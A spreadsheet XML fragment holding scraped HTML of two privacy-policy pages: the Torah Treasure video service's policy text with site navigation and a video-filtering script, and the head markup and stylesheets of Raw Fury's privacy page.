              Testimonials
            &lt;/a&gt;
            &lt;a href="/gift_cards/new" class="top_menu--link py-2 d-none d-md-inline-block"&gt;
              Gift Card
            &lt;/a&gt;
            &lt;a href="/pages/faq" class="top_menu--link py-2 d-none d-md-inline-block"&gt;
              FAQ
            &lt;/a&gt;
            &lt;a href="/pages/coloring-pages" class="top_menu--link py-2 d-none d-md-inline-block"&gt;
              Activities 
            &lt;/a&gt;
            &lt;a href="/pages/free-month" class="top_menu--link py-2 d-none d-md-inline-block"&gt;
              FREE MONTH
            &lt;/a&gt;
        &lt;div class="dropdown d-none d-md-inline-block" data-controller="dropdown"&gt;
          &lt;div class="dropdown--action"
               data-target="dropdown.selector"
               data-action="click-&gt;dropdown#toggle"&gt;
            &lt;a class="dropdown--head-link"&gt;
              Videos
              &lt;svg width="10px" height="5px" viewBox="0 0 10 5" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"&gt;
                  &lt;g id="Page-1" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd"&gt;
                      &lt;g id="catalogue-signed-in" transform="translate(-741.000000, -33.000000)" fill="rgba(255,255,255,.8)"&gt;
                          &lt;g id="header" transform="translate(0.000000, 21.000000)"&gt;
                              &lt;path d="M745.522616,15.8068583 L749.183027,12.1464466 C749.378289,11.9511845 749.694872,11.9511845</t>
  </si>
  <si>
    <t>749.890134,12.1464466 L749.898785,12.1550971 C750.094047,12.3503592 750.094047,12.6669417 749.898785,12.8622039</t>
  </si>
  <si>
    <t>L745.911138,16.8498501 C745.804608,16.9563806 745.661966,17.0047905 745.522616,16.9950799</t>
  </si>
  <si>
    <t>C745.383265,17.0047905 745.240623,16.9563806 745.134093,16.8498501 L741.146447,12.8622039 C740.951184,12.6669417 740.951184,12.3503592 741.146447,12.1550971</t>
  </si>
  <si>
    <t>L741.155097,12.1464466 C741.350359,11.9511845 741.666942,11.9511845 741.862204,12.1464466 L745.522616,15.8068583 Z" id="dropdown"&gt;&lt;/path&gt;
                          &lt;/g&gt;
                      &lt;/g&gt;
                  &lt;/g&gt;
              &lt;/svg&gt;
            &lt;/a&gt;
          &lt;/div&gt;
          &lt;div class="dropdown--body display-none-important" data-target="dropdown.content"&gt;
              &lt;a href="/catalog"&gt;All Videos&lt;/a&gt;
              &lt;a href="/pages/block-videos"&gt;Filter Videos&lt;/a&gt;
              &lt;a href="https://toveedo.com/programs/collection-qgh2k6qkoqi?categoryId=99304&amp;permalink=judge-judgement-5414be"&gt;12+&lt;/a&gt;
          &lt;/div&gt;
        &lt;/div&gt;
              &lt;a href="/sign_in" class="top_menu--link py-2 d-none d-md-inline-block"&gt;
                Sign In
              &lt;/a&gt;
  &lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
  &lt;main id="page" class="page-template"&gt;
    &lt;div class="page"&gt;
      &lt;div class="container"&gt;
  &lt;div class="page-padding row"&gt;
    &lt;div class="col-12"&gt;
      &lt;h1&gt;Privacy Policy&lt;/h1&gt;
      &lt;h2&gt;1. Description of Service&lt;/h2&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t>This privacy policy is intended to inform you about the information and data gathered by Torah Treasure (“us”, “we”) when you use this service, how we store your information, information we collect and to the degree your information may be used.&lt;/p&gt;
&lt;p&gt;Torah Treasure takes your privacy seriously. We do not rent, sell or share your personal information with other parties.&lt;/p&gt;
&lt;p&gt; We may update this Privacy Policy from time to time, you are a registered Torah Treasure user, we will attempt to inform you of any material changes by email.</t>
  </si>
  <si>
    <t>Otherwise, please check back frequently on the Torah Treasure website for the latest and most updated privacy policy posted here.&lt;/p&gt;
&lt;p&gt;Torah Treasure provides you with the opportunity to review, remove and modify any personal information that you provided previously under the Data Protection Act 1998, please contact us directly by email to make changes to your personal information. You may also update your personal information by logging into your Torah Treasure account and updating your details by clicking your username at the top right of the page then clicking Settings.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://www.uscreen.tv/privacy-policy/#" class="cont-link" id="cont-box1"&gt;&lt;/a&gt;&lt;br&gt;&lt;/p&gt;
&lt;h2&gt;2. Data Collection &amp; Use&lt;/h2&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t>We only collect the personal data you choose to provide us during your registration process. As part of the registration process in order to use Torah Treasure services you need to provide us with your Full Name, Email Address and Billing information, including credit card data or Paypal &amp;nbsp;information. You may elect to not provide any of the above info, but you will then not be able to use Torah Treasure services or certain features.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://www.uscreen.tv/privacy-policy/#" class="cont-link" id="cont-box2"&gt;&lt;/a&gt;&lt;br&gt;&lt;/p&gt;
&lt;h2&gt;3.</t>
  </si>
  <si>
    <t>Analytics&lt;/h2&gt;
&lt;p&gt; We may collect and store certain information about your interaction with Torah Treasure website and services, including cookies, IP Addresses, browser type, device type, location, Internet service provider (ISP), entry and exit pages, operating systems, time/date stamps, and other related data. Torah Treasure uses this information, which does not identify individual users, only to improve the quality of our services and products.</t>
  </si>
  <si>
    <t>If you choose to decline cookies via your browser, you will have some limitations in using Torah Treasure services.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://www.uscreen.tv/privacy-policy/#" class="cont-link" id="cont-box3"&gt;&lt;/a&gt;&lt;br&gt;&lt;/p&gt;
&lt;h2&gt;4. Email Notices&lt;/h2&gt;
&lt;p&gt;When you register to use Torah Treasure services or by purchasing any products from Torah Treasure services, your email will automatically be listed in the Torah Treasure mailing list. You will receive welcome information, account information, and other marketing related information related to Torah Treasure services and the products you viewed and purchased.</t>
  </si>
  <si>
    <t>You may also receive periodic emails from us notifying you of new features, products, titles and other related information for Torah Treasure services.&lt;/p&gt;
 &lt;p&gt;You may choose to opt out of receiving emails from Torah Treasure, but if you choose to do so, you will not receive technical support requests, account updates and notifications, product updates, security updates or updates to the Terms of Services of X as well as updates to Privacy Policy of Torah Treasure.&lt;/p&gt;
&lt;p&gt; At anytime if you forget your account information, you may log back onto Torah Treasure website and click forgot login on the login area screen, a password reset link will be emailed to you with further steps to reset your account info.&lt;/p&gt;
&lt;</t>
  </si>
  <si>
    <t>p&gt;&lt;/p&gt;
&lt;h2&gt;5. Security&lt;/h2&gt;
&lt;p&gt; We employ and protect all data with SSL encryption and other security measures to ensure you that your data is protected and safe.</t>
  </si>
  <si>
    <t>However please be advised that while we take extra measures to protect your data and integrity of your information, we cannot guarantee that our security measures will prevent unauthorized access from occurring. Please take the proper steps to maintain the security of your account information. We highly recommend that you set a tough to guess password for your registered account with Torah Treasure to ensure others from easily guessing your password.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://www.uscreen.tv/privacy-policy/#" class="cont-link" id="cont-box6"&gt;&lt;/a&gt;&lt;br&gt;&lt;/p&gt;
&lt;h2&gt;7.</t>
  </si>
  <si>
    <t>Contact Us&lt;/h2&gt;
&lt;p&gt;If you have any questions or concerns about this policy or any Torah Treasure services products, services or features, please don’t hesitate to contact us at info@TorahTreasure.com&lt;/p&gt;
    &lt;/div&gt;
  &lt;/div&gt;
&lt;/div&gt;
    &lt;/div&gt;
  &lt;/main&gt;
  &lt;footer id="colophon" class="site-footer white page-template-footer"&gt;
			&lt;div class="container center CAPS animatedParent animateOnce" data-sequence="100"&gt;
        &lt;a class="logo" href="#"&gt;
          &lt;img src="https://s3.amazonaws.com/unode1/assets/556/m0Cn6waRSUa3u0SlCs03_logo.svg" alt="Toveedo" class="animated pulse" data-id="1" /&gt;
        &lt;/a&gt;
				 &lt;ul id="menu-footer-menu" class="footer-menu center no-list no-margin"&gt;
  				  &lt;li class="menu-item"&gt;
  						&lt;a href="/pages/gift-card"&gt;
  							Gift Card
  						&lt;/a&gt;
  					&lt;/li&gt;
  				  &lt;li class="menu-item"&gt;
  						&lt;a href="/pages/contact-us"&gt;
  							Contact Us
  						&lt;/a&gt;
  					&lt;/li&gt;
  				  &lt;li class="menu-item"&gt;
  						&lt;a href="/pages/support"&gt;
  							Support
  						&lt;/a&gt;
  					&lt;/li&gt;
  				  &lt;li class="menu-item"&gt;
  						&lt;a href="/pages/terms"&gt;
  							Terms and Conditions
  						&lt;/a&gt;
  					 &lt;/li&gt;
  				  &lt;li class="menu-item"&gt;
  						&lt;a href="/pages/privacy-policy"&gt;
  							Privacy policy
  						&lt;/a&gt;
  					&lt;/li&gt;
  	    &lt;/ul&gt;
				&lt;p class="copyright no-margin"&gt;&amp;copy; 2023 All Rights Reserved.&lt;/p&gt;
			&lt;/div&gt;
&lt;/footer&gt;
  &lt;link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.0.13/css/all.css" integrity="sha384-DNOHZ68U8hZfKXOrtjWvjxusGo9WQnrNx2sqG0tfsghAvtVlRW3tvkXWZh58N9jp" crossorigin="anonymous"&gt;
  &lt;script src="https://assets-gke.uscreencdn.com/theme_assets/556/script.js?v=1681010367" async&gt;&lt;/script&gt;
  &lt;script&gt;
    var videos = null;
    let detectTemplate = () =&gt; {
      let programTitle = document.querySelector('h1[data-area="program-title"]:not(.touched)')
      if (programTitle) {
        videos.forEach(video =&gt; {
          if (video == programTitle.innerText.trim())</t>
  </si>
  <si>
    <t>{
            location.replace('/catalog')
          }
        })
        programTitle.classList.add('touched')
      }
      let cardTitles = document.querySelectorAll('.card-title:not(.touched)')
      if (cardTitles.length) {
        cardTitles.forEach(cardTitle =&gt; {
          cardTitle.classList.add('touched')
          videos.forEach(video =&gt; {
            if (cardTitle.innerText.trim() === video) {
              cardTitle.closest('.swiper-slide').classList.add('hidden')
            }
          })
        })
      }
      setTimeout(() =&gt; detectTemplate(), 500)
    }
    let infinityCall = () =&gt; {
      let page = document.querySelector('.card-title:not(.supper-touch)')
       if (page) {
        axios.get('/api/users/me', { headers: { 'Accept': 'application/json' }}).then(response =&gt; {
          videos = JSON.parse(response.data.field_1);
          if (videos) detectTemplate()
        })
        page.classList.add('supper-touch')
      }
      setTimeout(() =&gt; infinityCall(), 500)
    }
  &lt;/script&gt;
&lt;/body&gt;
&lt;/html&gt;</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;
&lt;html class="avada-html-layout-wide avada-html-header-position-top avada-has-site-width-percent avada-has-page-background-pattern" lang="en-US" prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb#"&gt;
&lt;head&gt;
	&lt;meta http-equiv="X-UA-Compatible" content="IE=edge" /&gt;
	&lt;meta http-equiv="Content-Type" content="text/html; charset=utf-8"/&gt;
	&lt;meta name="viewport" content="width=device-width, initial-scale=1" /&gt;
	&lt;style id="awlb-live-editor"&gt;.fusion-builder-live .fusion-builder-live-toolbar .fusion-toolbar-nav &gt; li.fusion-branding .fusion-builder-logo-wrapper .fusiona-avada-logo {background: url( http://rawfury.com/wp-content/uploads/2020/08/Raw-Fury-Logo-circle-avatar-PNG.png ) no-repeat center ! important;_x005F_x000D_
				background-size: contain ! important;_x005F_x000D_
				width: 30px;_x005F_x000D_
				height: 30px;}.fusion-builder-live .fusion-builder-live-toolbar .fusion-toolbar-nav &gt; li.fusion-branding .fusion-builder-logo-wrapper .fusiona-avada-logo:before {_x005F_x000D_
					display: none;_x005F_x000D_
				}&lt;/style&gt;&lt;meta name='robots' content='index, follow, max-image-preview:large, max-snippet:-1, max-video-preview:-1' /&gt;
	&lt;!--</t>
  </si>
  <si>
    <t>This site is optimized with the Yoast SEO plugin v19.6.1 - https://yoast.com/wordpress/plugins/seo/ --&gt;
	&lt;title&gt;Privacy Policy - Raw Fury&lt;/title&gt;
	&lt;link rel="canonical" href="https://rawfury.com/privacy-policy/" /&gt;
	&lt;meta property="og:locale" content="en_US" /&gt;
	&lt;meta property="og:type" content="article" /&gt;
	&lt;meta property="og:title" content="Privacy Policy - Raw Fury" /&gt;
	&lt;meta property="og:url" content="https://rawfury.com/privacy-policy/" /&gt;
	&lt;meta property="og:site_name" content="Raw Fury" /&gt;
	&lt;meta property="article:modified_time" content="2023-04-03T11:37:19+00:00" /&gt;
	&lt;meta name="twitter:card" content="summary_large_image" /&gt;
	&lt;meta name="twitter:label1" content="Est. reading time" /&gt;
	&lt;meta name="twitter:data1" content="14 minutes" /&gt;
	&lt;script type="application/ld+json" class="yoast-schema-graph"&gt;{"@context":"https://schema.org","@graph":[{"@type":"WebPage","@id":"https://rawfury.com/privacy-policy/","url":"https://rawfury.com/privacy-policy/","name":"Privacy Policy - Raw Fury","isPartOf":{"@id":"https://rawfury.com/#website"},"datePublished":"2020-08-18T13:45:44+00:00","dateModified":"2023-04-03T11:37:19+00:00","breadcrumb":{"@id":"https://rawfury.com/privacy-policy/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https://rawfury.com/privacy-policy/"]}]},{"@type":"BreadcrumbList","@id":"https://rawfury.com/privacy-policy/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https://rawfury.com/"},{"@type":"ListItem","position":2,"name":"Privacy Policy"}]},{"@type":"WebSite","@id":"https://rawfury.com/#website","url":"https://rawfury.com/","name":"Raw Fury","description":"Indie (un)publisher.","publisher":{"@id":"https://rawfury.com/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://rawfury.com/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https://rawfury.com/#organization","name":"Raw Fury","url":"https://rawfury.com/","sameAs":[],"logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https://rawfury.com/#/schema/logo/image/","url":"https://rawfury.com/wp-content/uploads/2020/08/Raw-Fury-Logo-circle-avatar-smaller.png","contentUrl":"https://rawfury.com/wp-content/uploads/2020/08/Raw-Fury-Logo-circle-avatar-smaller.png","width":64,"height":46,"caption":"Raw Fury"},"image":{"@id":"https://rawfury.com/#/schema/logo/image/"}}]}&lt;/script&gt;
	&lt;!-- / Yoast SEO plugin. --&gt;
&lt;link rel="alternate" type="application/rss+xml" title="Raw</t>
  </si>
  <si>
    <t xml:space="preserve">Fury &amp;raquo; Feed" href="https://rawfury.com/feed/" /&gt;
&lt;link rel="alternate" type="application/rss+xml" title="Raw Fury &amp;raquo; Comments Feed" href="https://rawfury.com/comments/feed/" /&gt;
					&lt;link rel="shortcut icon" href="https://rawfury.com/wp-content/uploads/2020/08/Raw-Fury-Logo-circle-avatar-smaller-retina.png" type="image/x-icon" /&gt;
		&lt;link rel="alternate" type="application/rss+xml" title="Raw Fury &amp;raquo; Privacy Policy Comments Feed" href="https://rawfury.com/privacy-policy/feed/" /&gt;
		&lt;meta property="og:title" content="Privacy Policy"/&gt;
		&lt;meta property="og:type" content="article"/&gt;
		&lt;meta property="og:url" content="https://rawfury.com/privacy-policy/"/&gt;
		&lt;meta property="og:site_name" content="Raw Fury"/&gt;
		&lt;meta property="og:description" content="Privacy Policy _x005F_x000D_
_ x000D_
RAW FURY AB PRIVACY POLICY _x005F_x000D_
_x005F_x000D_
UPDATED 3rd of April 2023 _x005F_x000D_
_x005F_x000D_
</t>
  </si>
  <si>
    <t>We do not normally go corporate, but when it’s about our users, we make the solemn vow to take care of your personal data till the last day, like a king protects his kingdom from creeps.  "/&gt;
				&lt;script type="text/javascript"&gt;
window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/rawfury.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.1.1"}};
/*! This file is auto-generated */
!function(e,a,t){var n,r,o,i=a.createElement("canvas"),p=i.getContext&amp;&amp;i.getContext("2d");function s(e,t){var a=String.fromCharCode,e=(p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,e),0,0),i.toDataURL());return p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,t),0,0),e===i.toDataURL()}function c(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(o=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},r=0;r&lt;</t>
  </si>
  <si>
    <t>important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
&lt;/style&gt;
	&lt;link rel='stylesheet' id='wp-block-library-css' href='https://rawfury.com/wp-includes/css/dist/block-library/style.min.css?ver=6.1.1' type='text/css' media='all' /&gt;
&lt;style id='wp-block-library-theme-inline-css' type='text/css'&gt;
 .wp-block-audio figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-audio figcaption{color:hsla(0,0%,100%,.65)}.wp-block-audio{margin:0 0 1em}.wp-block-code{border:1px solid #ccc;border-radius:4px;font-family:Menlo,Consolas,monaco,monospace;padding:.8em 1em}.wp-block-embed figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-embed figcaption{color:hsla(0,0%,100%,.65)}.wp-block-embed{margin:0 0 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:hsla(0,0%,100%,.65)}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{color:hsla(0,0%,100%,.65)}.wp-block-image{margin:0 0 1em}.wp-block-pullquote{border-top:4px solid;border-bottom:4px solid;margin-bottom:1.75em;color:currentColor}.wp-block-pullquote__citation,.wp-block-pullquote cite,.wp-block-pullquote footer{color:currentColor;text-transform:uppercase;font-size:.8125em;font-style:normal}.wp-block-quote{border-left:.25em solid;margin:0 0 1.75em;padding-left:1em}.wp-block-quote cite,.wp-block-quote footer{color:currentColor;font-size:.8125em;position:relative;font-style:normal}.wp-block-quote.has-text-align-right{border-left:none;border-right:.25em solid;padding-left:0;padding-right:1em}.wp-block-quote.has-text-align-center{border:none;padding-left:0}.wp-block-quote.is-large,.wp-block-quote.is-style-large,.wp-block-quote.is-style-plain{border:none}.wp-block-search .wp-block-search__label{font-weight:700}.wp-block-search__button{border:1px solid #ccc;padding:.375em .625em}:where(.wp-block-group.has-background){padding:1.25em 2.375em}.wp-block-separator.has-css-opacity{opacity:.4}.wp-block-separator{border:none;border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){border-bottom:none;height:1px}.wp-block-separator.has-background:not(.is-style-wide):not(.is-style-dots){height:2px}.wp-block-table{margin:"0 0 1em 0"}.wp-block-table</t>
  </si>
  <si>
    <t>thead{border-bottom:3px solid}.wp-block-table tfoot{border-top:3px solid}.wp-block-table td,.wp-block-table th{word-break:normal}.wp-block-table figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-table figcaption{color:hsla(0,0%,100%,.65)}.wp-block-video figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-video figcaption{color:hsla(0,0%,100%,.65)}.wp-block-video{margin:0 0 1em}.wp-block-template-part.has-background{padding:1.25em 2.375em;margin-top:0;margin-bottom:0}
&lt;/style&gt;
&lt;link rel='stylesheet' id='classic-theme-styles-css' href='https://rawfury.com/wp-includes/css/classic-themes.min.css?ver=1'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15px;--wp--preset--font-size--medium: 20px;--wp--preset--font-size--large: 30px;--wp--preset--font-size--x-large: 42px;--wp--preset--font-size--normal: 20px;--wp--preset--font-size--xlarge: 40px;--wp--preset--font-size--huge: 60px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;}:where(.is-layout-flex){gap: 0.5em;}body .is-layout-flow &gt; .alignleft{float: left;margin-inline-start: 0;margin-inline-end: 2em;}body .is-layout-flow &gt; .alignright{float: right;margin-inline-start: 2em;margin-inline-end: 0;}body .is-layout-flow &gt; .aligncenter{margin-left: auto !important;margin-right: auto ! important;}body .is-layout-constrained &gt; .alignleft{float: left;margin-inline-start: 0;margin-inline-end: 2em;}body .is-layout-constrained &gt; .alignright{float: right;margin-inline-start: 2em;margin-inline-end: 0;}body .is-layout-constrained &gt; .aligncenter{margin-left: auto !important;margin-right: auto ! important;}body .is-layout-constrained &gt; :where(:not(.alignleft):not(.alignright):not(.alignfull)){max-width: var(--wp--style--global--content-size);margin-left: auto !important;margin-right: auto !</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</si>
  <si>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rel='stylesheet' id='rc-tailwindcss-css' href='https://rawfury.com/wp-content/plugins/rawcember/assets/css/app.css?ver=1639046028' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='mc4wp-form-themes-css' href='https://rawfury.com/wp-content/plugins/mailchimp-for-wp/assets/css/form-themes.css?ver=4.8.10' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='fusion-dynamic-css-css' href='https://rawfury.com/wp-content/uploads/fusion-styles/124495c44cccc458625885dbb32e4d5e.min.css?ver=3.4.1' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='avada-max-1c-css' href='https://rawfury.com/wp-content/themes/Avada/assets/css/media/max-1c.min.css?ver=7.5' type='text/css' media='only screen and (max-width: 640px)' /&gt;
&lt;link rel='stylesheet' id='avada-max-2c-css' href='https://rawfury.com/wp-content/themes/Avada/assets/css/media/max-2c.min.css?ver=7.5' type='text/css' media='only screen and (max-width: 712px)' /&gt;
&lt;link rel='stylesheet' id='avada-min-2c-max-3c-css' href='https://rawfury.com/wp-content/themes/Avada/assets/css/media/min-2c-max-3c.min.css?ver=7.5' type='text/css' media='only screen and (min-width: 712px) and (max-width: 784px)' /&gt;
&lt;link rel='stylesheet' id='avada-min-3c-max-4c-css' href='https://rawfury.com/wp-content/themes/Avada/assets/css/media/min-3c-max-4c.min.css?ver=7.5' type='text/css' media='only screen and (min-width: 784px) and (max-width: 856px)' /&gt;
&lt;link rel='stylesheet' id='avada-min-4c-max-5c-css' href='https://rawfury.com/wp-content/themes/Avada/assets/css/media/min-4c-max-5c.min.css?ver=7.5' type='text/css' media='only screen and (min-width: 856px) and (max-width: 928px)' /&gt;
&lt;link rel='stylesheet' id='avada-min-5c-max-6c-css' href='https://rawfury.com/wp-content/themes/Avada/assets/css/media/min-5c-max-6c.min.css?ver=7.5' type='text/css' media='only screen and (min-width: 928px) and (max-width: 1000px)' /&gt;
&lt;link rel='stylesheet' id='avada-min-shbp-css' href='https://rawfury.com/wp-content/themes/Avada/assets/css/media/min-shbp.min.css?ver=7.5' type='text/css' media='only screen and (min-width: 801px)' /&gt;
&lt;link rel='stylesheet' id='avada-min-shbp-header-legacy-css' href='https://rawfury.com/wp-content/themes/Avada/assets/css/media/min-shbp-header-legacy.min.css?ver=7.5' type='text/css' media='only screen and (min-width: 801px)' /&gt;
&lt;link rel='stylesheet' id='avada-max-shbp-css' href='https://rawfury.com/wp-content/themes/Avada/assets/css/media/max-shbp.min.css?ver=7.5' type='text/css' media='only screen and (max-width: 800px)' /&gt;
&lt;link rel='stylesheet' id='avada-max-shbp-header-legacy-css' href='https://rawfury.com/wp-content/themes/Avada/assets/css/media/max-shbp-header-legacy.min.css?ver=7.5' type='text/css' media='only screen and (max-width: 800px)' /&gt;
&lt;link rel='stylesheet' id='avada-max-sh-shbp-css' href='https://rawfury.com/wp-content/themes/Avada/assets/css/media/max-sh-shbp.min.css?ver=7.5' type='text/css' media='only screen and (max-width: 800px)' /&gt;
&lt;link rel='stylesheet' id='avada-max-sh-shbp-header-legacy-css' href='https://rawfury.com/wp-content/themes/Avada/assets/css/media/max-sh-shbp-header-legacy.min.css?ver=7.5' type='text/css' media='only screen and (max-width: 800px)' /&gt;
&lt;link rel='stylesheet' id='avada-min-768-max-1024-p-css' href='https://rawfury.com/wp-content/themes/Avada/assets/css/media/min-768-max-1024-p.min.css?ver=7.5' type='text/css' media='only screen and (min-device-width: 768px) and (max-device-width: 1024px) and (orientation: portrait)' /&gt;
&lt;link rel='stylesheet' id='avada-min-768-max-1024-p-header-legacy-css' href='https://rawfury.com/wp-content/themes/Avada/assets/css/media/min-768-max-1024-p-header-legacy.min.css?ver=7.5' type='text/css' media='only screen and (min-device-width: 768px) and (max-device-width: 1024px) and (orientation: portrait)' /&gt;
&lt;link rel='stylesheet' id='avada-min-768-max-1024-l-css' href='https://rawfury.com/wp-content/themes/Avada/assets/css/media/min-768-max-1024-l.min.css?ver=7.5' type='text/css' media='only screen and (min-device-width: 768px) and (max-device-width: 1024px) and (orientation: landscape)' /&gt;
&lt;link rel='stylesheet' id='avada-min-768-max-1024-l-header-legacy-css' href='https://rawfury.com/wp-content/themes/Avada/assets/css/media/min-768-max-1024-l-header-legacy.min.css?ver=7.5' type='text/css' media='only screen and (min-device-width: 768px) and (max-device-width: 1024px) and (orientation: landscape)' /&gt;
&lt;link rel='stylesheet' id='avada-max-sh-cbp-css' href='https://rawfury.com/wp-content/themes/Avada/assets/css/media/max-sh-cbp.min.css?ver=7.5' type='text/css' media='only screen and (max-width: 800px)' /&gt;
&lt;link rel='stylesheet' id='avada-max-sh-sbp-css' href='https://rawfury.com/wp-content/themes/Avada/assets/css/media/max-sh-sbp.min.css?ver=7.5' type='text/css' media='only screen and (max-width: 800px)' /&gt;
&lt;link rel='stylesheet' id='avada-max-sh-640-css' href='https://rawfury.com/wp-content/themes/Avada/assets/css/media/max-sh-640.min.css?ver=7.5' type='text/css' media='only screen and (max-width: 640px)' /&gt;
&lt;link rel='stylesheet' id='avada-max-shbp-18-css' href='https://rawfury.com/wp-content/themes/Avada/assets/css/media/max-shbp-18.min.css?ver=7.5' type='text/css' media='only screen and (max-width: 782px)' /&gt;
&lt;link rel='stylesheet' id='avada-max-shbp-32-css' href='https://rawfury.com/wp-content/themes/Avada/assets/css/media/max-shbp-32.min.css?ver=7.5' type='text/css' media='only screen and (max-width: 768px)' /&gt;
&lt;link rel='stylesheet' id='avada-min-sh-cbp-css' href='https://rawfury.com/wp-content/themes/Avada/assets/css/media/min-sh-cbp.min.css?ver=7.5' type='text/css' media='only screen and (min-width: 800px)' /&gt;
&lt;link rel='stylesheet' id='avada-max-640-css' href='https://rawfury.com/wp-content/themes/Avada/assets/css/media/max-640.min.css?ver=7.5' type='text/css' media='only screen and (max-device-width: 640px)' /&gt;
&lt;link rel='stylesheet' id='avada-max-main-css' href='https://rawfury.com/wp-content/themes/Avada/assets/css/media/max-main.min.css?ver=7.5' type='text/css' media='only screen and (max-width: 1000px)' /&gt;
&lt;link rel='stylesheet' id='avada-max-cbp-css' href='https://rawfury.com/wp-content/themes/Avada/assets/css/media/max-cbp.min.css?ver=7.5' type='text/css' media='only screen and (max-width: 800px)' /&gt;
&lt;link rel='stylesheet' id='avada-max-640-sliders-css' href='https://rawfury.com/wp-content/themes/Avada/assets/css/media/max-640-sliders.min.css?ver=7.5' type='text/css' media='only screen and (max-device-width: 640px)' /&gt;
&lt;link rel='stylesheet' id='avada-max-sh-cbp-sliders-css' href='https://rawfury.com/wp-content/themes/Avada/assets/css/media/max-sh-cbp-sliders.min.css?ver=7.5' type='text/css' media='only screen and (max-width: 800px)' /&gt;
&lt;link rel='stylesheet' id='avada-max-sh-cbp-social-sharing-css' href='https://rawfury.com/wp-content/themes/Avada/assets/css/media/max-sh-cbp-social-sharing.min.css?ver=7.5' type='text/css' media='only screen and (max-width: 800px)' /&gt;
&lt;link rel='stylesheet' id='fb-max-sh-cbp-css' href='https://rawfury.com/wp-content/plugins/fusion-builder/assets/css/media/max-sh-cbp.min.css?ver=3.5' type='text/css' media='only screen and (max-width: 800px)' /&gt;
&lt;link rel='stylesheet' id='fb-min-768-max-1024-p-css' href='https://rawfury.com/wp-content/plugins/fusion-builder/assets/css/media/min-768-max-1024-p.min.css?ver=3.5' type='text/css' media='only screen and (min-device-width: 768px) and (max-device-width: 1024px) and (orientation: portrait)' /&gt;
&lt;link rel='stylesheet' id='fb-max-640-css' href='https://rawfury.com/wp-content/plugins/fusion-builder/assets/css/media/max-640.min.css?ver=3.5' type='text/css' media='only screen and (max-device-width: 640px)' /&gt;
&lt;link rel='stylesheet' id='fb-max-1c-css' href='https://rawfury.com/wp-content/plugins/fusion-builder/assets/css/media/max-1c.css?ver=3.5' type='text/css' media='only screen and (max-width: 640px)' /&gt;
&lt;link rel='stylesheet' id='fb-max-2c-css' href='https://rawfury.com/wp-content/plugins/fusion-builder/assets/css/media/max-2c.css?ver=3.5' type='text/css' media='only screen and (max-width: 712px)' /&gt;
&lt;link rel='stylesheet' id='fb-min-2c-max-3c-css' href='https://rawfury.com/wp-content/plugins/fusion-builder/assets/css/media/min-2c-max-3c.css?ver=3.5' type='text/css' media='only screen and (min-width: 712px) and (max-width: 784px)' /&gt;
&lt;link rel='stylesheet' id='fb-min-3c-max-4c-css' href='https://rawfury.com/wp-content/plugins/fusion-builder/assets/css/media/min-3c-max-4c.css?ver=3.5' type='text/css' media='only screen and (min-width: 784px) and (max-width: 856px)' /&gt;
&lt;link rel='stylesheet' id='fb-min-4c-max-5c-css' href='https://rawfury.com/wp-content/plugins/fusion-builder/assets/css/media/min-4c-max-5c.css?ver=3.5' type='text/css' media='only screen and (min-width: 856px) and (max-width: 928px)' /&gt;
&lt;link rel='stylesheet' id='fb-min-5c-max-6c-css' href='https://rawfury.com/wp-content/plugins/fusion-builder/assets/css/media/min-5c-max-6c.css?ver=3.5' type='text/css' media='only screen and (min-width: 928px) and (max-width: 1000px)' /&gt;
&lt;script type='text/javascript' src='https://rawfury.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.1' id='jquery-core-js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='https://rawfury.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2' id='jquery-migrate-js'&gt;&lt;/script&gt;
